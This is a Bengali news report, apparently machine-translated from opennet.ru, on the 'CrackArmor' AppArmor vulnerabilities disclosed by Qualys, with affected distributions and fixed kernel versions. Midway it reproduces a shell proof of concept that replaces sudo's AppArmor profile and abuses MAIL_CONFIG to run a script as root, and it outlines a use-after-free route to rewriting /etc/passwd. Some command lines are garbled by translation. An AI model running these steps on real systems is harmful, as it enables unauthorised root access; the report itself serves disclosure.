āĻ…ā§āϝāĻžāĻĒāφāĻ°ā§āĻŽāϰ⧇āϰ āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻž āϝāĻž āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽā§‡ āϰ⧁āϟ āĻ…ā§āϝāĻžāĻ•ā§āϏ⧇āϏ⧇āϰ āĻ…āύ⧁āĻŽāϤāĻŋ āĻĻ⧇āϝāĻŧ

Qualys AppArmor āĻŦāĻžāĻ§ā§āϝāϤāĻžāĻŽā§‚āϞāĻ• āĻ…ā§āϝāĻžāĻ•ā§āϏ⧇āϏ āĻ•āĻ¨ā§āĻŸā§āϰ⧋āϞ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽā§‡ āύāϝāĻŧāϟāĻŋ āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻž āϚāĻŋāĻšā§āύāĻŋāϤ āĻ•āϰ⧇āϛ⧇, āϝāĻžāϰ āĻŽāĻ§ā§āϝ⧇ āϏāĻŦāĻšā§‡āϝāĻŧ⧇ āϗ⧁āϰ⧁āϤāϰ āĻšāϞ āĻ¸ā§āĻĨāĻžāύ⧀āϝāĻŧ, āϏ⧁āĻŦāĻŋāϧāĻžāĻŦāĻžā§āϚāĻŋāϤ āĻŦā§āϝāĻŦāĻšāĻžāϰāĻ•āĻžāϰ⧀āϕ⧇ āϰ⧁āϟ āϏ⧁āĻŦāĻŋāϧāĻž āĻĒ⧇āϤ⧇, āĻŦāĻŋāĻšā§āĻ›āĻŋāĻ¨ā§āύ āĻ•āĻ¨ā§āĻŸā§‡āχāύāĻžāϰ āĻĨ⧇āϕ⧇ āĻŦ⧇āϰāĻŋāϝāĻŧ⧇ āφāϏāϤ⧇ āĻāĻŦāĻ‚ AppArmor-āĻĒā§āϰāϝāĻŧā§‹āĻ—āĻ•ā§ƒāϤ āĻŦāĻŋāϧāĻŋāύāĻŋāώ⧇āϧ āĻŦāĻžāχāĻĒāĻžāϏ āĻ•āϰāϤ⧇ āĻĻ⧇āϝāĻŧāĨ¤ āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻžāϗ⧁āϞāĻŋāϕ⧇ CrackArmor āϕ⧋āĻĄāύāĻžāĻŽ āĻĻ⧇āĻ“āϝāĻŧāĻž āĻšāϝāĻŧ⧇āϛ⧇āĨ¤ CVE āĻļāύāĻžāĻ•ā§āϤāĻ•āĻžāϰ⧀ āĻāĻ–āύāĻ“ āĻŦāϰāĻžāĻĻā§āĻĻ āĻ•āϰāĻž āĻšāϝāĻŧāύāĻŋāĨ¤ Ubuntu 24.04 āĻāĻŦāĻ‚ Debian 13-āϤ⧇ āϏāĻĢāϞ āϏ⧁āĻŦāĻŋāϧāĻžāĻŦāĻžā§āϚāĻŋāϤ āφāĻ•ā§āϰāĻŽāĻŖāϗ⧁āϞāĻŋ āĻĒā§āϰāĻĻāĻ°ā§āĻļāĻŋāϤ āĻšāϝāĻŧ⧇āϛ⧇āĨ¤

⧍ā§Ļā§§ā§­ āϏāĻžāϞ⧇ āĻĒā§āϰāĻ•āĻžāĻļāĻŋāϤ Linux āĻ•āĻžāĻ°ā§āύ⧇āϞ ā§Ē.ā§§ā§§ āĻĨ⧇āϕ⧇ AppArmor LSM āĻŽāĻĄāĻŋāωāϞ⧇ āϏāĻŽāĻ¸ā§āϝāĻž āĻĻ⧇āĻ–āĻž āĻĻāĻŋāϝāĻŧ⧇āϛ⧇ āĻāĻŦāĻ‚ Ubuntu, Debian, openSUSE āĻāĻŦāĻ‚ SUSE āĻāϰ āĻŽāϤ⧋ AppArmor āĻŦā§āϝāĻŦāĻšāĻžāϰāĻ•āĻžāϰ⧀ āĻĄāĻŋāĻ¸ā§āĻŸā§āϰāĻŋāĻŦāĻŋāωāĻļāύāϗ⧁āϞāĻŋāϕ⧇ āĻĒā§āϰāĻ­āĻžāĻŦāĻŋāϤ āĻ•āϰ⧇ (openSUSE/SUSE ā§§ā§Ŧ āĻĻāĻŋāϝāĻŧ⧇ āĻļ⧁āϰ⧁ āĻ•āϰ⧇, SELinux āĻĄāĻŋāĻĢāĻ˛ā§āϟāϰ⧂āĻĒ⧇ āϏāĻ•ā§āϰāĻŋāϝāĻŧ āĻĨāĻžāϕ⧇, āϤāĻŦ⧇ AppArmor āĻāĻ–āύāĻ“ āĻāĻ•āϟāĻŋ āĻŦāĻŋāĻ•āĻ˛ā§āĻĒ)āĨ¤ āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻžāϗ⧁āϞāĻŋ āϏāĻŽāĻžāϧāĻžāύāĻ•āĻžāϰ⧀ āĻĒā§āϝāĻžāϚāϗ⧁āϞāĻŋ Linux āĻ•āĻžāĻ°ā§āύ⧇āϞ āϰāĻ•ā§āώāĻŖāĻžāĻŦ⧇āĻ•ā§āώāĻŖāĻ•āĻžāϰ⧀āĻĻ⧇āϰ āĻ•āĻžāϛ⧇ āϜāĻŽāĻž āĻĻ⧇āĻ“āϝāĻŧāĻž āĻšāϝāĻŧ⧇āϛ⧇ āĻāĻŦāĻ‚ āφāĻ—āĻžāĻŽā§€ āĻĻāĻŋāύ⧇ 6.18.18, 6.19.8, 6.12.77, 6.6.130, 6.1.167, 5.15.203 āĻāĻŦāĻ‚ 5.10.253 āφāĻĒāĻĄā§‡āĻŸā§‡āϰ āĻ…āĻ‚āĻļ āĻšāĻŋāϏāĻžāĻŦ⧇ āĻŦā§āϝāĻŦāĻšāĻžāϰāĻ•āĻžāϰ⧀āĻĻ⧇āϰ āĻ•āĻžāϛ⧇ āĻĒā§āϰāĻ•āĻžāĻļ āĻ•āϰāĻž āĻšāĻŦ⧇āĨ¤ āĻāχ āϏāĻŽāĻžāϧāĻžāύāϟāĻŋ āφāϜāϕ⧇āϰ Ubuntu āĻ•āĻžāĻ°ā§āύ⧇āϞ āĻĒā§āϝāĻžāϕ⧇āϜ āφāĻĒāĻĄā§‡āĻŸā§‡āĻ“ āĻ…āĻ¨ā§āϤāĻ°ā§āϭ⧁āĻ•ā§āϤ āϰāϝāĻŧ⧇āϛ⧇āĨ¤ āχāϤāĻŋāĻŽāĻ§ā§āϝ⧇, āωāĻŦ⧁āĻ¨ā§āϟ⧁ sudo, sudo-ldap, āĻāĻŦāĻ‚ util-linux āĻĒā§āϝāĻžāϕ⧇āϜāϗ⧁āϞāĻŋāϰ (āϝāĻžāϰ āĻŽāĻ§ā§āϝ⧇ su āχāωāϟāĻŋāϞāĻŋāϟāĻŋ āĻ…āĻ¨ā§āϤāĻ°ā§āϭ⧁āĻ•ā§āϤ) āφāĻĒāĻĄā§‡āϟ āĻĒā§āϰāĻ•āĻžāĻļ āĻ•āϰ⧇āϛ⧇, āϝāĻžāϤ⧇ AppArmor āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻžāϰ āĻļā§‹āώāϪ⧇āϰ āĻ…āύ⧁āĻŽāϤāĻŋ āĻĻ⧇āĻ“ā§ŸāĻž āĻ¤ā§āϰ⧁āϟāĻŋāϗ⧁āϞāĻŋ āϏāĻ‚āĻļā§‹āϧāύ āĻ•āϰāĻž āĻšāϝāĻŧ⧇āϛ⧇āĨ¤ āĻĄā§‡āĻŦāĻŋāϝāĻŧāĻžāύ āĻāĻ•āϟāĻŋ āφāĻĒāĻĄā§‡āϟ āĻĒā§āϰāĻ¸ā§āϤ⧁āϤ āĻ•āϰāϛ⧇āĨ¤

āϏāĻŽāĻ¸ā§āϝāĻžāϗ⧁āϞāĻŋ AppArmor-āĻāϰ āĻāĻ•āϟāĻŋ āĻŽā§ŒāϞāĻŋāĻ• "confused-deputy" āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻžāϰ āĻ•āĻžāϰāϪ⧇ āϘāĻŸā§‡, āϝāĻž āϏ⧁āĻŦāĻŋāϧāĻžāĻŦāĻžā§āϚāĻŋāϤ āĻŦā§āϝāĻŦāĻšāĻžāϰāĻ•āĻžāϰ⧀āĻĻ⧇āϰ āχāĻšā§āĻ›āĻžāĻŽāϤ AppArmor āĻĒā§āϰ⧋āĻĢāĻžāχāϞ āϞ⧋āĻĄ, āĻĒā§āϰāϤāĻŋāĻ¸ā§āĻĨāĻžāĻĒāύ āĻāĻŦāĻ‚ āĻŽā§āϛ⧇ āĻĢ⧇āϞāĻžāϰ āĻ…āύ⧁āĻŽāϤāĻŋ āĻĻ⧇āϝāĻŧāĨ¤ āĻāχ āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻž āϏāϰāĻžāϏāϰāĻŋ āĻ¸ā§āĻĨāĻžāύ⧀āϝāĻŧ āĻāĻŦāĻ‚ āĻĻā§‚āϰāĻŦāĻ°ā§āϤ⧀ āφāĻ•ā§āϰāĻŽāĻŖ āĻĨ⧇āϕ⧇ āĻĒā§āϰ⧋āĻ—ā§āϰāĻžāĻŽ āĻāĻŦāĻ‚ āĻĒāϰāĻŋāώ⧇āĻŦāĻžāϗ⧁āϞāĻŋāϰ āϏ⧁āϰāĻ•ā§āώāĻž āĻ…āĻ•ā§āώāĻŽ āĻ•āϰāϤ⧇ āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰāĻž āϝ⧇āϤ⧇ āĻĒāĻžāϰ⧇ (pseudo-files /sys/kernel/security/apparmor/.load, .replace, āĻāĻŦāĻ‚ .remove āϞāĻŋāϖ⧇, āωāĻĻāĻžāĻšāϰāĻŖāĻ¸ā§āĻŦāϰ⧂āĻĒ, cupsd āĻāĻŦāĻ‚ rsyslogd-āĻ āϏ⧀āĻŽāĻžāĻŦāĻĻā§āϧāϤāĻž āĻ…āĻĒāϏāĻžāϰāĻŖ āĻ•āϰāϤ⧇), āĻĒāϰāĻŋāώ⧇āĻŦāĻž āĻ…āĻ¸ā§āĻŦā§€āĻ•āĻžāϰ⧇āϰ āĻ•āĻžāϰāĻŖ āĻšāϤ⧇ āĻĒāĻžāϰ⧇ (deny āĻĒā§āϰ⧋āĻĢāĻžāχāϞ āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇), āĻāĻŦāĻ‚ āύ⧇āĻŽāĻ¸ā§āĻĒ⧇āϏ āϏ⧀āĻŽāĻžāĻŦāĻĻā§āϧāϤāĻž āĻŦāĻžāχāĻĒāĻžāϏ āĻ•āϰāϤ⧇ āĻĒāĻžāϰ⧇ (āĻāĻ•āϟāĻŋ āύāϤ⧁āύ AppArmor āĻĒā§āϰ⧋āĻĢāĻžāχāϞ "userns" āϞ⧋āĻĄ āĻ•āϰ⧇, āωāĻĻāĻžāĻšāϰāĻŖāĻ¸ā§āĻŦāϰ⧂āĻĒ, /usr/bin/time āĻāϰ āϜāĻ¨ā§āϝ, āϏ⧀āĻŽāĻžāĻšā§€āύ āĻŦā§āϝāĻŦāĻšāĻžāϰāĻ•āĻžāϰ⧀āϰ āύāĻžāĻŽāĻ¸ā§āĻĨāĻžāύ āϤ⧈āϰāĻŋāϰ āĻ…āύ⧁āĻŽāϤāĻŋ āĻĻ⧇āϝāĻŧ)āĨ¤

AppArmor āĻĒā§āϰ⧋āĻĢāĻžāχāϞ āĻĒā§āϰāϤāĻŋāĻ¸ā§āĻĨāĻžāĻĒāύ āĻ•āϰāĻžāϰ āĻ•ā§āώāĻŽāϤāĻžāϰ āĻŽāĻžāĻ§ā§āϝāĻŽā§‡ su āĻāĻŦāĻ‚ sudo-āĻāϰ āĻŽāϤ⧋ āĻŦāĻŋāĻļ⧇āώāĻžāϧāĻŋāĻ•āĻžāϰāĻĒā§āϰāĻžāĻĒā§āϤ āχāωāϟāĻŋāϞāĻŋāϟāĻŋāϗ⧁āϞāĻŋāϤ⧇ āύāϤ⧁āύ āĻĒā§āϰ⧋āĻĢāĻžāχāϞ āϏāĻ‚āϝ⧁āĻ•ā§āϤ āĻ•āϰ⧇ āϰ⧁āϟ āĻĒā§āϰāĻŋāĻ­āĻŋāϞ⧇āϜ āĻ…āĻ°ā§āϜāύ āĻ•āϰāĻž āϝāĻžāϝāĻŧ, āϝāĻž āύāĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āϟ āĻ•āĻŋāϛ⧁ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻ•āϞ⧇ āĻ…ā§āϝāĻžāĻ•ā§āϏ⧇āϏ āĻŦā§āϞāĻ• āĻ•āϰ⧇ āĻĻ⧇āϝāĻŧāĨ¤ āĻŦāĻŋāĻļ⧇āώāϤ, sudo āχāωāϟāĻŋāϞāĻŋāϟāĻŋāϰ āϜāĻ¨ā§āϝ setuid (CAP_SETUID) āĻ…āĻĒāĻžāϰ⧇āĻļāύāϟāĻŋ āύāĻŋāĻˇā§āĻ•ā§āϰāĻŋāϝāĻŧ āĻ•āϰāĻžāϰ āĻĒāĻžāĻļāĻžāĻĒāĻžāĻļāĻŋ āĻŽā§‡āχāϞ ​​āϏ⧇āϟāĻŋāĻ‚āϏ āϧāĻžāϰāĻŖāĻ•āĻžāϰ⧀ āĻĄāĻŋāϰ⧇āĻ•ā§āϟāϰāĻŋ āĻĒāϰāĻŋāĻŦāĻ°ā§āϤāύ āĻ•āϰāĻžāϰ āϜāĻ¨ā§āϝ MAIL_CONFIG āĻāύāĻ­āĻžāϝāĻŧāϰāύāĻŽā§‡āĻ¨ā§āϟ āϭ⧇āϰāĻŋāϝāĻŧ⧇āĻŦāϞāϟāĻŋ āĻŽā§āϝāĻžāύāĻŋāĻĒ⧁āϞ⧇āϟ āĻ•āϰāĻžāϰ āĻŽāĻžāĻ§ā§āϝāĻŽā§‡ āϰ⧁āϟ āĻĒā§āϰāĻŋāĻ­āĻŋāϞ⧇āϜ āĻ…āĻ°ā§āϜāύ āĻ•āϰāĻž āϝ⧇āϤ⧇ āĻĒāĻžāϰ⧇āĨ¤ āϏāĻžāĻ°ā§āĻ­āĻžāϰ āĻĒā§‹āĻ¸ā§āϟāĻĢāĻŋāĻ•ā§āϏāĨ¤

/usr/sbin/sendmail āϚāĻžāϞāĻžāύ⧋āϰ āϏāĻŽāϝāĻŧ āϏāĻŽāĻ¸ā§āϝāĻž āĻĻ⧇āĻ–āĻž āĻĻāĻŋāϞ⧇ āĻāχ āĻĒāĻĻā§āϧāϤāĻŋāϤ⧇ sudo āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āĻ…ā§āϝāĻžāĻĄāĻŽāĻŋāύāĻŋāĻ¸ā§āĻŸā§āϰ⧇āϟāϰāϕ⧇ āχāĻŽā§‡āϞ āĻĒāĻžāĻ āĻžāύ⧋ āĻšāϝāĻŧāĨ¤ āĻŦāĻŋāĻļ⧇āώāĻžāϧāĻŋāĻ•āĻžāϰ āĻĄāĻžāĻŽā§āĻĒāĻŋāĻ‚ āύāĻŋāĻˇā§āĻ•ā§āϰāĻŋāϝāĻŧ āĻ•āϰ⧇, āĻāχ āĻĒā§āϰāĻ•ā§āϰāĻŋāϝāĻŧāĻžāϟāĻŋ āϰ⧁āϟ āĻŦāĻŋāĻļ⧇āώāĻžāϧāĻŋāĻ•āĻžāϰ āĻĻāĻŋāϝāĻŧ⧇ āϚāĻžāϞāĻžāύ⧋ āϝ⧇āϤ⧇ āĻĒāĻžāϰ⧇āĨ¤ sudo āϚāĻžāϞāĻžāύ⧋āϰ āφāϗ⧇ MAIL_CONFIG āĻĒāϰāĻŋāĻŦ⧇āĻļ āĻĒāϰāĻŋāĻŦāĻ°ā§āϤāύāĻļā§€āϞ āϏ⧇āϟ āĻ•āϰ⧇, āφāĻĒāύāĻŋ sendmail-āĻ āĻ…āĻ¨ā§āϝāĻžāĻ¨ā§āϝ āϏ⧇āϟāĻŋāĻ‚āϏ āĻĒāĻžāϏ āĻ•āϰāϤ⧇ āĻĒāĻžāϰ⧇āύ, āϝāĻžāϰ āĻŽāĻ§ā§āϝ⧇ āĻŽā§‡āχāϞ ​​āĻĒāĻžāĻ āĻžāύ⧋āϰ āϏāĻŽāϝāĻŧ āϚāĻžāϞāĻžāύ⧋āϰ āϜāĻ¨ā§āϝ āĻāĻ•āϟāĻŋ āĻ•āĻžāĻ¸ā§āϟāĻŽ āĻĒā§‹āĻ¸ā§āϟāĻĄā§āϰāĻĒ āĻšā§āϝāĻžāĻ¨ā§āĻĄāϞāĻžāϰ āύāĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āϟ āĻ•āϰāĻž āĻ…āĻ¨ā§āϤāĻ°ā§āϭ⧁āĻ•ā§āϤāĨ¤ $ mkdir /tmp/postfix $ cat > /tmp/postfix/main.cf << "EOF" command_directory = /tmp/postfix EOF $ cat > /tmp/postfix/postdrop << "EOF" #!/bin/sh /usr/bin/id >> /tmp/postfix/pwned EOF $ chmod -R 0755 /tmp/postfix $ apparmor_parser -K -o sudo.pf << "EOF" /usr/bin/sudo { āĻĢāĻžāχāϞ⧇āϰ āĻ…āύ⧁āĻŽāϤāĻŋ āĻĻāĻŋāύ, āϏāĻ‚āϕ⧇āϤ⧇āϰ āĻ…āύ⧁āĻŽāϤāĻŋ āĻĻāĻŋāύ, āύ⧇āϟāĻ“āϝāĻŧāĻžāĻ°ā§āϕ⧇āϰ āĻ…āύ⧁āĻŽāϤāĻŋ āĻĻāĻŋāύ, āĻ•ā§āώāĻŽāϤāĻžāϰ āĻ…āύ⧁āĻŽāϤāĻŋ āĻĻāĻŋāύ, āĻ•ā§āώāĻŽāϤāĻžāϰ āĻ…āĻ¸ā§āĻŦā§€āĻ•āĻžāϰ āĻ•āϰ⧁āύ setuid, } EOF $ su -P -c 'stty raw && cat sudo.pf' "$USER" > /sys/kernel/security/apparmor/.replace āĻĒāĻžāϏāĻ“āϝāĻŧāĻžāĻ°ā§āĻĄ: $ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo āϝāĻžāχ āĻšā§‹āĻ• āύāĻž āϕ⧇āύ sudo: PERM_SUDOERS: setresuid(-1, 1, -1): āĻ…āĻĒāĻžāϰ⧇āĻļāύ āĻ…āύ⧁āĻŽā§‹āĻĻāĻŋāϤ āύāϝāĻŧ sudo: /etc/sudoers āϖ⧁āϞāϤ⧇ āĻ…āĻ•ā§āώāĻŽ: āĻ…āĻĒāĻžāϰ⧇āĻļāύ āĻ…āύ⧁āĻŽā§‹āĻĻāĻŋāϤ āύāϝāĻŧ sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: āĻ…āĻĒāĻžāϰ⧇āĻļāύ āĻ…āύ⧁āĻŽā§‹āĻĻāĻŋāϤ āύāϝāĻŧ sudo: āĻ…āĻĄāĻŋāϟ āĻĒā§āϞāĻžāĻ—āχāύ āĻļ⧁āϰ⧁ āĻ•āϰāĻžāϰ āϏāĻŽāϝāĻŧ āĻ¤ā§āϰ⧁āϟāĻŋ sudoers_audit $ cat /tmp/postfix/pwned uid=0(root) gid=1001(jane) groups=1001(jane),100(users)

āϏ⧁āĻŦāĻŋāϧāĻž āĻŦ⧃āĻĻā§āϧāĻŋāϰ āĻ…āĻ¨ā§āϝāĻžāĻ¨ā§āϝ āĻĒāĻĻā§āϧāϤāĻŋāϰ āĻŽāĻ§ā§āϝ⧇ āϰāϝāĻŧ⧇āϛ⧇ āϞāĻŋāύāĻžāĻ•ā§āϏ āĻ•āĻžāĻ°ā§āύ⧇āϞ āĻ¸ā§āϤāϰ⧇ āϚāϞāĻŽāĻžāύ AppArmor āϕ⧋āĻĄā§‡āϰ āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻžāĨ¤ āĻāϟāĻŋ āĻĻ⧇āĻ–āĻžāύ⧋ āĻšāϝāĻŧ⧇āϛ⧇ āĻ•āĻŋāĻ­āĻžāĻŦ⧇ free() āĻĢāĻžāĻ‚āĻļāύ⧇āϰ āĻĻā§āĻŦāĻŋāϗ⧁āĻŖ āϏāĻŽā§āĻĒāĻžāĻĻāύ āĻāĻŦāĻ‚ AppArmor āĻĒā§āϰ⧋āĻĢāĻžāχāϞ āϞ⧋āĻĄāĻŋāĻ‚ āĻāĻŦāĻ‚ āĻĒā§āϰāϤāĻŋāĻ¸ā§āĻĨāĻžāĻĒāύ āϕ⧋āĻĄā§‡ āχāϤāĻŋāĻŽāĻ§ā§āϝ⧇-āĻŽā§āĻ•ā§āϤ āĻŽā§‡āĻŽāϰāĻŋ (āĻŦā§āϝāĻŦāĻšāĻžāϰ-āĻĒāϰ-āĻŽā§āĻ•ā§āϤ) āĻ…ā§āϝāĻžāĻ•ā§āϏ⧇āϏ⧇āϰ āĻĢāϞ⧇ āϏ⧃āĻˇā§āϟ āĻĻ⧁āĻ°ā§āĻŦāϞāϤāĻž āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āϰ⧁āϟ āϏ⧁āĻŦāĻŋāϧāĻž āĻ…āĻ°ā§āϜāύ āĻ•āϰāĻž āϝāĻžāϝāĻŧāĨ¤ āωāĻĻāĻžāĻšāϰāĻŖāĻ¸ā§āĻŦāϰ⧂āĻĒ, AppArmor aa_loaddata āĻ•āĻžāĻ āĻžāĻŽā§‹āϤ⧇ āĻāĻ•āϟāĻŋ āĻĒā§āϰ⧋āĻĢāĻžāχāϞ āϏāĻ‚āϰāĻ•ā§āώāĻŖ āĻ•āϰ⧇, āϝāĻžāϰ āϜāĻ¨ā§āϝ āĻŽā§‡āĻŽāϰāĻŋ kmalloc-192 āĻ¸ā§āĻ˛ā§āϝāĻžāĻŦ āĻ•ā§āϝāĻžāĻļ⧇ āĻŦāϰāĻžāĻĻā§āĻĻ āĻ•āϰāĻž āĻšāϝāĻŧāĨ¤ āĻāĻ•āϟāĻŋ āϰ⧇āϏ āĻļāĻ°ā§āϤ āĻāχ āĻ•āĻžāĻ āĻžāĻŽā§‹āϟāĻŋ āĻŽā§āĻ•ā§āϤ āĻ•āϰāĻžāϰ āĻĒāϰ⧇ āĻĻāĻ–āϞāĻ•ā§ƒāϤ āĻŽā§‡āĻŽāϰāĻŋ āĻ…ā§āϝāĻžāĻ•ā§āϏ⧇āϏ āĻ•āϰāϤ⧇ āĻĒāĻžāϰ⧇āĨ¤ āĻāχ āϏāĻŽāĻ¸ā§āϝāĻžāϟāĻŋ āĻŽā§āĻ•ā§āϤ āĻŽā§‡āĻŽāϰāĻŋāϰ āωāĻĒāϰ āύāĻŋāϝāĻŧāĻ¨ā§āĻ¤ā§āϰāĻŖ āĻ…āĻ°ā§āϜāύ āĻ•āϰāϤ⧇ āĻāĻŦāĻ‚ /etc/passwd āĻĢāĻžāχāϞ⧇āϰ āĻŦāĻŋāώāϝāĻŧāĻŦāĻ¸ā§āϤ⧁ āĻŽā§āϝāĻžāĻĒ āĻ•āϰāĻžāϰ āϜāĻ¨ā§āϝ āĻŽā§āĻ•ā§āϤ āĻŽā§‡āĻŽāϰāĻŋ āĻĒ⧃āĻˇā§āĻ āĻžāϟāĻŋ āĻĒ⧁āύāϰāĻžāϝāĻŧ āĻŦāϰāĻžāĻĻā§āĻĻ āĻ•āϰāϤ⧇ āĻāĻŦāĻ‚ āϰ⧁āϟ āĻĒāĻžāϏāĻ“āϝāĻŧāĻžāĻ°ā§āĻĄ āĻ¸ā§āĻŸā§āϰāĻŋāĻ‚ āĻ“āĻ­āĻžāϰāϰāĻžāχāϟ āĻ•āϰāϤ⧇ āĻ•āĻžāĻœā§‡ āϞāĻžāĻ—āĻžāύ⧋ āϝ⧇āϤ⧇ āĻĒāĻžāϰ⧇āĨ¤

āωāĻ¤ā§āϏ: opennet.ru

āĻāĻ•āϟāĻŋ āĻŽāĻ¨ā§āϤāĻŦā§āϝ āϜ⧁āĻĄāĻŧ⧁āύ